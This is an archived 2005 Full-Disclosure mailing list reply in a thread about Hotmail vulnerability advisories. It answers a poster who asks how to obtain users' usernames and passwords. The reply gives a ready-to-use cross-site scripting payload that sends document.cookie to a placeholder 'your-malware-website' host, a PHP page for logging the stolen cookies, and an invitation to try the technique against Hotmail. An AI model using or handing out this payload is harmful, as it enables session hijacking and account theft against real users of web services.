lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 4 May 2005 14:41:15 +0200 From: "Jerome Athias" <jerome.athias@...e.fr> To: "Sherwyn Williams" <sherwill22@...il.com>, "Luis A. Cortes Zavala" <luis.cortes@...ersec.co.uk>, <full-disclosure@...ts.grok.org.uk>, <vulnwatch@...nwatch.org>, <bugtraq@...urityfocus.com> Subject: Re: Re: [VulnWatch] Hotmail Advisories > Ok I think I get what you are saying, however to use this vuln, would > need to have a script running on a server some where that recieves the > username and password? > > Or just based on what you have here this can be possible. If one does not > have knowledge of java script, all the would have to do is use those > various html codes you wrote and send that to them as an attachment, but > how would I get the username and password ???? For example, this is a simple way to steal a cookie: Inject this code: <script>window.open('http://www.your-malware-website.com/givemecook.php?cook='%2Bdocument.cookie);</script> And on "your-malware-website" put this page: givemecook.php: <? echo $HTTP_COOKIE_VARS["cook"]; ?> and so, the cookie will be logged in "your-malware-website" >> I was testing this until I can get some working code, the authorization >> and >> validation of the site is one of the better that I seen on a mailing >> system, >> I never heard about vulnerabilities of hotmail as in others systems, I >> just >> have knowledge of two flaws discovered. One on 1999 is from George >> Guninski, >> and the other when the pwdreset function make its public, every year >> hotmail >> is updated, and getting more secure, and it's hard to believe that no one >> have found this before. Try to play with this in hotmail http://seclists.org/lists/bugtraq/2005/Feb/0473.html Cheers, Jerome _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists